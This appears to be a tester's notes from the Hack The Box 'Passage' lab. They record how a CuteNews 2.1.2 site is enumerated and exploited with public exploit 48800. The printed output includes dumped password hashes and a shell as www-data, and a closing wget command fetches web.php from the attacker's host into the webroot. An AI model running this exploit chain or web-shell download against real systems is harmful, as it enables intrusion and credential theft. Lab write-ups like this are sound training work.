2 :80 cutenews
http://passage.htb/
Passage News
| powered by CuteNews
# exploring links on homepage
http://passage.htb/index.php?id=11
title: **Implemented Fail2Ban**
| Due to unusally large amounts of traffic, we have implementated Fail2Ban on our website. Let it be known that excessive access to our server will be met with a two minute ban on your IP Address. While we do not wish to lock out our legitimate users, this decision is necessary in order to ensure a safe viewing experience. Please proceed with caution as you browse through our extensive news selection.
# thats why gobuster was failing.
http://passage.htb/index.php?id=1 | http://passage.htb/index.php?id=2
dummy post(s)
| contains comments with hyperlinks to email
|sid@example.com; kim@example.com; james@example.com
# possible usernames
sid
kim
james
http://passage.htb/index.php?do=archives
empty
# after looking at exploitdb codes, figured out login page location
passage.htb/CuteNews/index.php
CuteNews Login Page
| Powered by CuteNews 2.1.2
# default creds not working
Using https://www.exploit-db.com/exploits/48800
$ python3 48800.py
Enter the URL> http://passage.htb
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
================================================================
=============================
Registering a users
=============================
[+] Registration successful with username: qEM3RR2PBi and password: qEM3RR2PBi
=======================================================
Sending Payload
=======================================================
signature_key: 3c9e6c971012ed480337f426e025f957-qEM3RR2PBi
signature_dsi: 6eefcec595fa42981021e24645af1820
logged in user: qEM3RR2PBi
============================
Dropping to a SHELL
============================
command > whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
passage
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
# shell using
command > wget 10.10.16.5/web.php -O /var/www/html/web.php
> http://passage.htb/web.phpLast updated